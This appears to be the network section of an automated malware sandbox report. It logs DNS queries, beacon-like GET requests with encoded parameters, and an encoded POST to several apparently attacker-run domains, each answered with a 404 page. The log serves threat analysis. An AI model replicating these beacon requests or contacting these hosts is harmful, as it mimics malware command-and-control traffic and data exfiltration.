            Source: global trafficHTTP traffic detected: GET /mquw/?2VDlJ=Z2VdhTx&x0wHoJ8X=9VhEAk+nBcRFJItebzuYkEWcWYPrTgvEZy86ZzmkaEauDk+ByEDFhBf1SE1efnbmII1/0Q2I2f54RFseImhioiSeit22xDiqKKd7jVQmz4n0QSDnRFZQupGXvMbNczsPDQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.chinaen.orgConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /f1gw/?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.study-in-nyc.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.nobartv6.website
            Source: global trafficDNS traffic detected: DNS query: www.sailnway.net
            Source: global trafficDNS traffic detected: DNS query: www.chinaen.org
            Source: global trafficDNS traffic detected: DNS query: www.study-in-nyc.online
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 43 69 57 5a 50 32 61 51 75 4c 36 47 77 67 5a 68 31 35 78 70 56 57 63 48 71 59 46 49 54 54 56 72 51 50 42 79 4b 59 3d Data Ascii: x0wHoJ8X=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5CiWZP2aQuL6GwgZh15xpVWcHqYFITTVrQPByKY=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:35 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:38 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:40 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:43 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:52 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 14:19:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 14:19:19 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
